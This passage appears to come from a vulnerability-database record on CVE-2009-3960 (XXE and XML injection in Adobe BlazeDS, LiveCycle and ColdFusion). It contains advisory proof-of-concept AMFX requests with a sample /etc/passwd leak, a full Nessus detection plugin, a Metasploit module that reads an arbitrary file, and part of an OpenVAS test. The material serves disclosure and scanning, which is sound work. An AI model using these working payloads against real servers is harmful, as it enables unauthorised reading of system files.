folder of the application. 
\r\nBy default, the HTTPChannel classes are mapped to \r\nthe following endpoints:\r\n\r\n1. http://{server.name}:{server.port}/{context.root}/messagebroker/http\r\n2. https://{server.name}:{server.port}/{context.root}/messagebroker/httpsecure\r\n\r\nNote that the HTTPChannel may be mapped to different \r\nendpoints. \r\nThis depends on the deployed application and the \r\nframework in use (e.g. BlazeDS, Adobe LiveCycle \r\nData Services, etc.).\r\n\r\n+--------------------------------------------+\r\n|Exploitation - XML External Entity Injection|\r\n+--------------------------------------------+\r\n\r\nXML entities can be declared and included within AMFX\r\nrequests passed to the HTTPChannel. The XML parser \r\nparses the payload and successfully processes \r\ninjected entities.\r\n\r\nThe following table shows an example of XML external\r\nentity injection which leads to local file disclosure.\r\nThe AMFX request is sent via the HTTPChannel endpoint\r\nin BlazeDS.\r\n\r\nXML External Entity Injection \u2013 Local File Disclosure\r\nPoC \u2013 BlazeDS \u2013 Request\r\n\r\nPOST /samples/messagebroker/http HTTP/1.1\r\nContent-type: application/x-amf\r\n\r\n<?xml version="1.0" encoding="utf-8"?>\r\n<!DOCTYPE test [ <!ENTITY x3 SYSTEM "/etc/passwd"> ]>\r\n<amfx ver="3" xmlns="http://www.macromedia.com/2005/amfx">\r\n <body>\r\n <object type="flex.messaging.messages.CommandMessage">\r\n <traits>\r\n <string>body</string><string>clientId</string><string>correlationId</string>\r\n <string>destination</string><string>headers</string><string>messageId</string>\r\n <string>operation</string><string>timestamp</string><string>timeToLive</string>\r\n </traits><object><traits />\r\n </object>\r\n <null /><string /><string />\r\n <object>\r\n <traits>\r\n <string>DSId</string><string>DSMessagingVersion</string>\r\n </traits>\r\n <string>nil</string><int>1</int>\r\n </object>\r\n <string>&x3;</string>\r\n<int>5</int><int>0</int><int>0</int>\r\n </object>\r\n 
</body>\r\n</amfx>\r\n\r\n\r\nXML External Entity Injection \u2013 Local File Inclusion\r\nPoC \u2013 BlazeDS \u2013 Response\r\n\r\n<?xml version="1.0" encoding="utf-8"?>\r\n<amfx ver="3"><header name="AppendToGatewayUrl" mustUnderstand="true">\r\n<string>;jsessionid=2191D3647221B72039C5B05D38084A42</string></header>\r\n<body targetURI="/onResult" responseURI="">\r\n<object type="flex.messaging.messages.AcknowledgeMessage">\r\n<traits><string>timestamp</string><string>headers</string>\r\n<string>body</string><string>correlationId</string>\r\n<string>messageId</string><string>timeToLive</string>\r\n<string>clientId</string><string>destination</string>\r\n</traits><double>1.257387140632E12</double><object>\r\n<traits><string>DSMessagingVersion</string>\r\n<string>DSId</string></traits><double>1.0</double>\r\n<string>BDE929FE-270D-3B56-1061-616E8B938429</string>\r\n</object><null/><string>root:x:0:0:root:/root:/bin/bash\r\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh\r\nbin:x:2:2:bin:/bin:/bin/sh\r\nsys:x:3:3:sys:/dev:/bin/sh\r\nsync:x:4:65534:sync:/bin:/bin/sync\r\ngames:x:5:60:games:/usr/games:/bin/sh\r\nman:x:6:12:man:/var/cache/man:/bin/sh\r\nlp:x:7:7:lp:/var/spool/lpd:/bin/sh\r\n[...]\r\n\r\n\r\nThe above injection was successfully tested on \r\nmultiple Adobe products, as shown below:\r\n\r\n1. Product: Adobe BlazeDS 3.2.0.39\r\nLinux Ubuntu 9.04 / Tomcat 6.0.14\r\n\r\nEndpoint URIs:\r\n\r\n{server.name}:{server.port}/\r\n{context.root}/messagebroker/http\r\n{server.name}:{server.port}/\r\n{context.root}/messagebroker/httpsecure\t\r\n\r\nMethods: POST, GET\r\nProtocols: HTTP, HTTPS\r\n\r\n\r\n2. Adobe LiveCycle Data Services ES2 3.0\r\nWindows XP SP2 / Tomcat 6.0.14\r\n\r\nEndpoint URIs:\r\n\r\n{server.name}:{server.port}/\r\n{context.root}/messagebroker/http\r\n{server.name}:{server.port}/\r\n{context.root}/messagebroker/httpsecure\t\r\n\r\nMethods: POST, GET\r\nProtocols: HTTP, HTTPS\r\n\r\n3. 
ColdFusion 9.0\r\nWindows XP SP2 / Tomcat 6.0.14\r\n\r\nEndpoint URIs:\r\n\r\n{server.name}:{server.port}/\r\n{context.root}/flex2gateway/http\r\n{server.name}:{server.port}/\r\n{context.root}/flex2gateway/httpsecure \r\n\r\nMethods: POST, GET\r\nProtocols: HTTP, HTTPS\r\n\r\n4. Adobe LiveCycle ES2\r\nWindows XP SP2 / IBM Websphere 7.0\r\n\r\nEndpoint URIs:\r\n\r\n{server.name}:{server.port}/\r\n{context.root}/messagebroker/http\r\n{server.name}:{server.port}/\r\n{context.root}/messagebroker/httpsecure\t\r\n\r\nMethods: POST, GET\r\nProtocols: HTTP, HTTPS\r\n\r\nThe vendor has released several patches for this \r\nvulnerability. See the Solution section of this \r\ndocument for more information.\r\n\r\n+----------------------------+\r\n|Exploitation - XML Injection|\r\n+----------------------------+\r\n\r\nThe XML parser lacks of proper input and output \r\nvalidation controls. Security-Assessment.com managed\r\nto inject arbitrary XML content which was returned\r\nin the XML response. \r\nThe following table shows an XML injection in the \r\nBlazeDS HTTPChannel. The injected payload becomes \r\npart of the response. In this case, injection is \r\npossible via the \u201cresponseURI\u201d attribute.\r\n\r\nXMLInjection \u2013 BlazeDS - Request\r\n\r\nPOST /samples/messagebroker/http HTTP/1.1\r\nContent-type: application/x-amf\r\n\r\n<?xml version="1.0" encoding="utf-8"?>\r\n<amfx ver="3"><body targetURI="" responseURI="d&quot; injectedattr=&quot;anything"><null/>\r\n</body></amfx>\r\n\r\nXMLInjection \u2013 BlazeDS - Response\r\n\r\n<?xml version="1.0" encoding="utf-8"?>\r\n<amfx ver="3"><body targetURI="d" injectedattr="anything" responseURI=""><null/></body></amfx></body></amfx>\r\n\r\nThe above injection was successfully tested on \r\nmultiple Adobe products, as shown below:\r\n\r\n1. 
Product: Adobe BlazeDS 3.2.0.39\r\nLinux Ubuntu 9.04 / Tomcat 6.0.14\r\n\r\nEndpoint URIs:\r\n\r\n{server.name}:{server.port}/\r\n{context.root}/messagebroker/http\r\n{server.name}:{server.port}/\r\n{context.root}/messagebroker/httpsecure\t\r\n\r\nMethods: POST, GET\r\nProtocols: HTTP, HTTPS\r\n\r\n\r\n2. Adobe LiveCycle Data Services ES2 3.0\r\nWindows XP SP2 / Tomcat 6.0.14\r\n\r\nEndpoint URIs:\r\n\r\n{server.name}:{server.port}/\r\n{context.root}/messagebroker/http\r\n{server.name}:{server.port}/\r\n{context.root}/messagebroker/httpsecure\t\r\n\r\nMethods: POST, GET\r\nProtocols: HTTP, HTTPS\r\n\r\n3. ColdFusion 9.0\r\nWindows XP SP2 / Tomcat 6.0.14\r\n\r\nEndpoint URIs:\r\n\r\n{server.name}:{server.port}/\r\n{context.root}/flex2gateway/http\r\n{server.name}:{server.port}/\r\n{context.root}/flex2gateway/httpsecure \r\n\r\nMethods: POST, GET\r\nProtocols: HTTP, HTTPS\r\n\r\n4. Adobe LiveCycle ES2\r\nWindows XP SP2 / IBM Websphere 7.0\r\n\r\nEndpoint URIs:\r\n\r\n{server.name}:{server.port}/\r\n{context.root}/messagebroker/http\r\n{server.name}:{server.port}/\r\n{context.root}/messagebroker/httpsecure\t\r\n\r\nMethods: POST, GET\r\nProtocols: HTTP, HTTPS\r\n\r\n\r\nThe vendor has released several patches for this \r\nvulnerability. See the Solution section of this \r\ndocument for more information.\r\n\r\n\r\n+--------+\r\n|Solution|\r\n+--------+\r\n\r\nSecurity-Assessment.com follows responsible\r\ndisclosure and promptly contacted the vendor after \r\ndiscovering the issues. The vendor was contacted on \r\nthe 6th November 2009 and a reply was received on the\r\nsame day. The vendor released security patches on \r\nthe 11th February 2010.\r\n \r\nThe security patches can be downloaded at the \r\nfollowing website: \r\n\r\nhttp://www.adobe.com/support/security/bulletins/apsb10-05.html\r\n\r\n\r\n+------+\r\n|Credit|\r\n+------+\r\n\r\nDiscovered and advised to Adobe in\r\nNovember 2009 by Roberto Suggi Liverani of Security-\r\nAssessment.com. 
Personal Page: http://malerisch.net/\r\n\r\nFor full details regarding this vulnerability\r\ndownload the PDF from our website:\r\n\r\nhttp://www.security-assessment.com/files/advisories/2010-02-22_Multiple_Adobe_Products-XML_External_Entity_and_XML_Injection.pdf\r\n\r\n\r\n+---------+\r\n|Greetings|\r\n+---------+\r\n\r\nBug found at Hack in The Sun 2009, Waiheke Island.\r\n\r\n\r\n+-----------------------------+\r\n|About Security-Assessment.com|\r\n+-----------------------------+\r\n\r\nSecurity-Assessment.com is a New Zealand based world\r\nleader in web application testing, network security\r\nand penetration testing. Security-Assessment.com\r\nservices organisations across New Zealand, Australia,\r\nAsia Pacific, the United States and the United\r\nKingdom.\r\n\r\nRoberto Suggi Liverani", "modified": "2010-02-25T00:00:00", "published": "2010-02-25T00:00:00", "id": "SECURITYVULNS:DOC:23288", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:23288", "title": "Multiple Adobe Products - XML External Entity And XML Injection Vulnerabilities", "type": "securityvulns", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "nessus": [{"lastseen": "2019-01-16T20:10:23", "bulletinFamily": "scanner", "description": "The remote host appears to be running an Adobe product that is\nsusceptible to XML External Entity (XXE) attacks. The installed\nversion of the product fails to block the use of external XML entities\nwhile using the HTTPChannel to transport data in AMFX format. A\nremote, unauthenticated attacker could exploit this vulnerability to\nread arbitrary files from the remote system. 
\n\nAccording to the Adobe advisory, Adobe BlazeDS, LiveCycle, LiveCycle\nData Services, Flex Data Services and ColdFusion are known to be\naffected by this issue.", "modified": "2018-11-15T00:00:00", "published": "2010-03-01T00:00:00", "id": "ADOBE_MULTIPLE_PRODUCTS_XXE.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=44937", "title": "Multiple Adobe Products XML External Entity (XXE) Injection (APSB10-05)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(44937);\n script_version(\"1.24\");\n script_cvs_date(\"Date: 2018/11/15 20:50:16\");\n\n script_cve_id(\"CVE-2009-3960\");\n script_bugtraq_id(38197);\n script_xref(name:\"EDB-ID\", value:\"11529\");\n script_xref(name:\"Secunia\", value:\"38543\");\n\n script_name(english:\"Multiple Adobe Products XML External Entity (XXE) Injection (APSB10-05)\");\n script_summary(english:\"Attempts to retrieve a local file\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is susceptible to XML External Entity (XXE)\nattacks.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host appears to be running an Adobe product that is\nsusceptible to XML External Entity (XXE) attacks. The installed\nversion of the product fails to block the use of external XML entities\nwhile using the HTTPChannel to transport data in AMFX format. A\nremote, unauthenticated attacker could exploit this vulnerability to\nread arbitrary files from the remote system. 
\n\nAccording to the Adobe advisory, Adobe BlazeDS, LiveCycle, LiveCycle\nData Services, Flex Data Services and ColdFusion are known to be\naffected by this issue.\" );\n # http://www.security-assessment.com/files/advisories/2010-02-22_Multiple_Adobe_Products-XML_External_Entity_and_XML_Injection.pdf\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?6688a1e2\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/bugtraq/2010/Feb/197\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://www.adobe.com/support/security/bulletins/apsb10-05.html\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate vendor-supplied patches.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Adobe XML External Entity File Disclosure\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/02/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/02/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/03/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\",value:\"cpe:/a:adobe:lifecycle\");\n script_set_attribute(attribute:\"cpe\",value:\"cpe:/a:adobe:lifecycle_data_services\");\n script_set_attribute(attribute:\"cpe\",value:\"cpe:/a:adobe:flex_data_services\");\n 
script_set_attribute(attribute:\"cpe\",value:\"cpe:/a:adobe:coldfusion\");\n script_set_attribute(attribute:\"cpe\",value:\"cpe:/a:adobe:blazeds\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"http_version.nasl\",\"os_fingerprint.nasl\");\n script_require_ports(\"Services/www\", 80, 8400, 8500);\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"data_protection.inc\");\n\nport = get_http_port(default:80);\n\n# Make a list of known HTTPChannel endpoints.\n\n# Check for sample apps only if thorough_tests\n# are enabled\n\nif(thorough_tests)\n{\n if (get_port_transport(port) > ENCAPS_IP)\n {\n urls = make_list(\n \"/flex2gateway/http\", # ColdFusion 9 (disabled by default)\n \"/flex2gateway/httpsecure\", # ColdFusion 9 (disabled by default)\n \"/messagebroker/http\",\n \"/messagebroker/httpsecure\",\n \"/blazeds/messagebroker/http\", # Blazeds 3.2\n \"/blazeds/messagebroker/httpsecure\", #\n \"/samples/messagebroker/http\", # Blazeds 3.2\n \"/samples/messagebroker/httpsecure\", # Blazeds 3.2\n \"/lcds/messagebroker/http\", # LCDS\n \"/lcds/messagebroker/httpsecure\", # LCDS\n \"/lcds-samples/messagebroker/http\", # LCDS\n \"/lcds-samples/messagebroker/httpsecure\"); # LCDS\n }\n else\n {\n urls = make_list(\n \"/flex2gateway/http\", # ColdFusion 9 (disabled by default)\n \"/messagebroker/http\",\n \"/blazeds/messagebroker/http\", # Blazeds 3.2\n \"/samples/messagebroker/http\", # Blazeds 3.2\n \"/lcds/messagebroker/http\", # LCDS\n \"/lcds-samples/messagebroker/http\"); # LCDS\n }\n}\nelse\n{\n if (get_port_transport(port) > ENCAPS_IP)\n {\n # nb : Both endpoints (http/httpsecure) are vulnerable on\n # encrypted 
ports.\n\n urls = make_list(\n \"/flex2gateway/http\", # ColdFusion 9 (disabled by default)\n \"/flex2gateway/httpsecure\", # ColdFusion 9 (disabled by default)\n \"/messagebroker/http\",\n \"/messagebroker/httpsecure\", # Blazeds 3.2\n \"/blazeds/messagebroker/http\", # Blazeds 3.2\n \"/blazeds/messagebroker/httpsecure\",\n \"/lcds/messagebroker/http\", # LCDS\n \"/lcds/messagebroker/httpsecure\"); # LCDS\n }\n else\n {\n urls = make_list(\n \"/flex2gateway/http\", # ColdFusion 9 (disabled by default)\n \"/messagebroker/http\",\n \"/blazeds/messagebroker/http\", # Blazeds 3.2\n \"/lcds/messagebroker/http\"); # LCDS\n }\n}\n\nos = get_kb_item(\"Host/OS\");\nif (os)\n{\n if (\"Windows\" >< os) injections = make_list(\n '<!DOCTYPE foo [ <!ENTITY nessus SYSTEM \"c:\\\\windows\\\\win.ini\"> ]>',\n '<!DOCTYPE foo [ <!ENTITY nessus SYSTEM \"c:\\\\winnt\\\\win.ini\"> ]>');\n else injections = make_list(\n '<!DOCTYPE foo [ <!ENTITY nessus SYSTEM \"/etc/passwd\"> ]>');\n}\nelse injections = make_list(\n '<!DOCTYPE foo [ <!ENTITY nessus SYSTEM \"c:\\\\windows\\\\win.ini\"> ]>',\n '<!DOCTYPE foo [ <!ENTITY nessus SYSTEM \"c:\\\\winnt\\\\win.ini\"> ]>',\n '<!DOCTYPE foo [ <!ENTITY nessus SYSTEM \"/etc/passwd\"> ]>');\n\ninjection_pats = make_array();\ninjection_pats['<!DOCTYPE foo [ <!ENTITY nessus SYSTEM \"c:\\\\windows\\\\win.ini\"> ]>'] = \"\\[[a-zA-Z\\s]+\\]|; for 16-bit app support\";\ninjection_pats['<!DOCTYPE foo [ <!ENTITY nessus SYSTEM \"c:\\\\winnt\\\\win.ini\"> ]>'] = \"\\[[a-zA-Z\\s]+\\]|; for 16-bit app support\";\ninjection_pats['<!DOCTYPE foo [ <!ENTITY nessus SYSTEM \"/etc/passwd\"> ]>'] = \"root:.*:0:[01]:\";\n\ninfo = NULL;\n\nforeach injection (injections)\n{\n foreach url (urls)\n {\n exploit = '<?xml version=\"1.0\" encoding=\"utf-8\"?>' + '\\n' +\n injection + '\\n' +\n '<amfx ver=\"3\" xmlns=\"http://www.macromedia.com/2005/amfx\">' + '\\n' +\n ' <body>' + '\\n' +\n ' <object type=\"flex.messaging.messages.CommandMessage\">' + '\\n' +\n ' <traits>' + 
'\\n' +\n ' <string>body</string><string>clientId</string><string>correlationId</string>' + '\\n' +\n ' <string>destination</string><string>headers</string><string>messageId</string>' + '\\n' +\n ' <string>operation</string><string>timestamp</string><string>timeToLive</string>' + '\\n' +\n ' </traits><object><traits />' + '\\n' +\n ' </object>' + '\\n' +\n ' <null /><string /><string />' + '\\n' +\n ' <object>' + '\\n' +\n ' <traits>' + '\\n' +\n ' <string>DSId</string><string>DSMessagingVersion</string>' + '\\n' +\n ' </traits>' + '\\n' +\n ' <string>nil</string><int>1</int>' + '\\n' +\n ' </object>' + '\\n' +\n ' <string>&nessus;</string>' + '\\n' +\n '<int>5</int><int>0</int><int>0</int>' + '\\n' +\n ' </object>' + '\\n' +\n ' </body>' + '\\n' +\n '</amfx>';\n\n res = http_send_recv3(\n method:\"POST\",\n item:url,\n port:port,\n add_headers: make_array(\"Content-Type\", \"application/x-amf\"),\n data:exploit,\n exit_on_fail:TRUE);\n\n match = egrep(pattern:injection_pats[injection], string:res[2]);\n\n if (\n res[2] &&\n \"<amfx\" >< res[2] &&\n (!empty_or_null(match))\n )\n {\n req = http_last_sent_request();\n output = NULL;\n\n if (\"win.ini\" >< injection)\n {\n file = \"win.ini\";\n }\n else file = \"/etc/passwd\";\n\n # Format output\n pos = stridx(match, \"null/><string>\");\n if (pos > 0 && !empty_or_null(pos))\n {\n output = substr(match, pos);\n output = output - \"null/><string>\";\n }\n # Should never reach this, but just in case\n if (empty_or_null(output))\n output = extract_pattern_from_resp(string:res[2], pattern:'RE:'+injection_pats[injection]);\n\n output = data_protection::redact_etc_passwd(output:output);\n info += '\\n' + 'HTTPChannel Endpoint : ' + url + '\\n';\n snip = crap(data:\"-\", length:30)+' snip '+ crap(data:\"-\", length:30);\n info += '\\n' +\n 'Nessus was able to exploit the issue to retrieve the contents of ' +\n '\\n' + \"'\" + file + \"'\" + ' using the following request :' +\n '\\n\\n' +req +'\\n\\n' +\n 'This produced the 
following truncated output (limited to 10 lines) :' +\n '\\n' + snip +\n '\\n' + beginning_of_response2(resp:output, max_lines:10) +\n '\\n' + snip +\n '\\n';\n }\n if (!isnull(info)) break;\n }\n if (!isnull(info)) break;\n}\n\nif (!isnull(info))\n{\n if (report_verbosity > 0)\n {\n report = '\\n' +\n \"Nessus found following vulnerable HTTPChannel endpoint : \" + '\\n' +\n info + '\\n';\n security_warning(port:port, extra:report);\n }\n else\n security_warning(port);\n}\nelse exit(0, 'Nessus did not identify any affected endpoints on the webserver listening on port '+ port);\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "d2": [{"lastseen": "2016-09-25T14:11:07", "bulletinFamily": "exploit", "description": "**Name**| d2sec_adobe \n---|--- \n**CVE**| CVE-2009-3960 \n**Exploit Pack**| [D2ExploitPack](<http://http://www.d2sec.com/products.htm>) \n**Description**| d2sec_adobe \n**Notes**| \n", "modified": "2010-02-15T13:30:00", "published": "2010-02-15T13:30:00", "id": "D2SEC_ADOBE", "href": "http://exploitlist.immunityinc.com/home/exploitpack/D2ExploitPack/d2sec_adobe", "title": "DSquare Exploit Pack: D2SEC_ADOBE", "type": "d2", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "metasploit": [{"lastseen": "2019-02-12T12:52:53", "bulletinFamily": "exploit", "description": "Multiple Adobe Products -- XML External Entity Injection. 
Affected Software: BlazeDS 3.2 and earlier versions, LiveCycle 9.0, 8.2.1, and 8.0.1, LiveCycle Data Services 3.0, 2.6.1, and 2.5.1, Flex Data Services 2.0.1, ColdFusion 9.0, 8.0.1, 8.0, and 7.0.2", "modified": "2017-08-27T01:01:10", "published": "2010-11-04T02:11:31", "id": "MSF:AUXILIARY/SCANNER/HTTP/ADOBE_XML_INJECT", "href": "", "type": "metasploit", "title": "Adobe XML External Entity Injection", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Scanner\n\n def initialize\n super(\n 'Name' => 'Adobe XML External Entity Injection',\n 'Description' => %q{\n Multiple Adobe Products -- XML External Entity Injection. Affected Software: BlazeDS 3.2 and\n earlier versions, LiveCycle 9.0, 8.2.1, and 8.0.1, LiveCycle Data Services 3.0, 2.6.1, and\n 2.5.1, Flex Data Services 2.0.1, ColdFusion 9.0, 8.0.1, 8.0, and 7.0.2\n },\n 'References' =>\n [\n [ 'CVE', '2009-3960' ],\n [ 'OSVDB', '62292' ],\n [ 'BID', '38197' ],\n [ 'URL', 'http://www.security-assessment.com/files/advisories/2010-02-22_Multiple_Adobe_Products-XML_External_Entity_and_XML_Injection.pdf' ],\n [ 'URL', 'http://www.adobe.com/support/security/bulletins/apsb10-05.html'],\n ],\n 'Author' => [ 'CG' ],\n 'License' => MSF_LICENSE\n )\n\n register_options(\n [\n Opt::RPORT(8400),\n OptString.new('FILE', [ true, \"File to read\", '/etc/passwd']),\n ])\n end\n\n def run_host(ip)\n path = [\n \"/flex2gateway/\",\n \"/flex2gateway/http\", # ColdFusion 9 (disabled by default), works on some CF 8 though :-)\n \"/flex2gateway/httpsecure\", # ColdFusion 9 (disabled by default) SSL\n \"/flex2gateway/cfamfpolling\",\n \"/flex2gateway/amf\",\n \"/flex2gateway/amfpolling\",\n \"/messagebroker/http\",\n \"/messagebroker/httpsecure\", #SSL\n \"/blazeds/messagebroker/http\", # Blazeds 3.2\n 
\"/blazeds/messagebroker/httpsecure\", #SSL\n \"/samples/messagebroker/http\", # Blazeds 3.2\n \"/samples/messagebroker/httpsecure\", # Blazeds 3.2 SSL\n \"/lcds/messagebroker/http\", # LCDS\n \"/lcds/messagebroker/httpsecure\", # LCDS -- SSL\n \"/lcds-samples/messagebroker/http\", # LCDS\n \"/lcds-samples/messagebroker/httpsecure\", # LCDS -- SSL\n ]\n\n postrequest = \"<\\?xml version=\\\"1.0\\\" encoding=\\\"utf-8\\\"\\?>\"\n postrequest << \"<\\!DOCTYPE test [ <\\!ENTITY x3 SYSTEM \\\"#{datastore['FILE']}\\\"> ]>\"\n postrequest << \"<amfx ver=\\\"3\\\" xmlns=\\\"http://www.macromedia.com/2005/amfx\\\">\"\n postrequest << \"<body><object type=\\\"flex.messaging.messages.CommandMessage\\\"><traits>\"\n postrequest << \"<string>body</string><string>clientId</string><string>correlationId</string><string>destination</string>\"\n postrequest << \"<string>headers</string><string>messageId</string><string>operation</string><string>timestamp</string>\"\n postrequest << \"<string>timeToLive</string></traits><object><traits /></object><null /><string /><string /><object>\"\n postrequest << \"<traits><string>DSId</string><string>DSMessagingVersion</string></traits><string>nil</string>\"\n postrequest << \"<int>1</int></object><string>&x3;</string><int>5</int><int>0</int><int>0</int></object></body></amfx>\"\n\n path.each do | check |\n\n res = send_request_cgi({\n 'uri' => check,\n 'method' => 'POST',\n 'version' => '1.1',\n 'Content-Type' => 'application/x-amf',\n 'data' => postrequest\n }, 25)\n\n if (res.nil?)\n print_error(\"no response for #{ip}:#{rport} #{check}\")\n elsif (res.code == 200 and res.body =~ /\\<\\?xml version\\=\"1.0\" encoding=\"utf-8\"\\?\\>/)\n print_status(\"#{rhost}:#{rport} #{check} #{res.code}\\n #{res.body}\")\n elsif (res and res.code == 302 or res.code == 301)\n print_status(\" Received 302 to #{res.headers['Location']} for #{check}\")\n else\n print_error(\"#{res.code} for #{check}\")\n #''\n end\n end\n rescue ::Rex::ConnectionRefused, 
::Rex::HostUnreachable, ::Rex::ConnectionTimeout, Rex::ConnectionError =>e\n print_error(e.message)\n rescue Timeout::Error, Errno::EINVAL, Errno::ECONNRESET, EOFError, Errno::ECONNABORTED, Errno::ECONNREFUSED, Errno::EHOSTUNREACH =>e\n print_error(e.message)\n end\nend\n\n#set FILE /proc/sys/kernel/osrelease\n#set FILE /proc/sys/kernel/hostname\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/http/adobe_xml_inject.rb"}], "openvas": [{"lastseen": "2019-02-14T14:49:42", "bulletinFamily": "scanner", "description": "Adobe BlazeDS is prone to an XML-injection vulnerability and an XML External Entity injection vulnerability.", "modified": "2019-02-14T00:00:00", "published": "2015-02-11T00:00:00", "id": "OPENVAS:1361412562310105211", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310105211", "title": "Adobe BlazeDS XML and XML External Entity Injection Vulnerabilities", "type": "openvas", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n# $Id: sw_adobe_xxe_38197.nasl 13659 2019-02-14 08:34:21Z cfischer $\n#\n# Adobe BlazeDS XML and XML External Entity Injection Vulnerabilities\n#\n# Authors:\n# Christian Fischer <info@schutzwerk.com>\n#\n# Copyright:\n# Copyright (c) 2015 SCHUTZWERK GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR 
PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.105211\");\n script_version(\"$Revision: 13659 $\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_name(\"Adobe BlazeDS XML and XML External Entity Injection Vulnerabilities\");\n script_bugtraq_id(38197);\n script_cve_id(\"CVE-2009-3960\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-02-14 09:34:21 +0100 (Thu, 14 Feb 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-02-11 14:56:42 +0100 (Wed, 11 Feb 2015)\");\n script_category(ACT_ATTACK);\n script_family(\"Web application abuses\");\n script_copyright(\"This script is Copyright (C) 2015 SCHUTZWERK GmbH\");\n script_dependencies(\"find_service.nasl\", \"http_version.nasl\", \"os_detection.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n\n script_tag(name:\"impact\", value:\"Attackers can exploit these issues to obtain sensitive information and carry out other attacks.\");\n script_tag(name:\"vuldetect\", value:\"Send an modificated GET request and check the response\");\n script_tag(name:\"solution\", value:\"Updates are available, please refer to the linked advisory.\");\n script_tag(name:\"summary\", value:\"Adobe BlazeDS is prone to an XML-injection vulnerability and an XML External Entity injection vulnerability.\");\n script_tag(name:\"affected\", value:\"The following applications are affected:\n\n BlazeDS 3.2 and earlier versions\n LiveCycle 9.0, 8.2.1, and 8.0.1\n LiveCycle Data Services 3.0, 2.6.1, and 2.5.1\n 
Flex Data Services 2.0.1\n ColdFusion 9.0, 8.0.1, 8.0, and 7.0.2\");\n\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/38197\");\n script_xref(name:\"URL\", value:\"http://www.adobe.com/support/security/bulletins/apsb10-05.html\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_app\");\n\n script_timeout(600);\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"host_details.inc\");\n\nport = get_http_port( default:80 );\n\nfiles = traversal_files();\nurls = make_list( \"/flex2gateway/\",\n \"/flex2gateway/http\",\n \"/flex2gateway/httpsecure\",\n \"/flex2gateway/cfamfpolling\",\n \"/flex2gateway/amf\",\n \"/flex2gateway/amfpolling\",\n \"/messagebroker/http\",\n \"/messagebroker/httpsecure\",\n \"/blazeds/messagebroker/http\",\n \"/blazeds/messagebroker/httpsecure\",\n \"/samples/messagebroker/http\",\n \"/samples/messagebroker/httpsecure\",\n \"/lcds/messagebroker/http\",\n \"/lcds/messagebroker/httpsecure\",\n \"/lcds-samples/messagebroker/http\",\n \"/lcds-samples/messagebroker/httpsecure\" 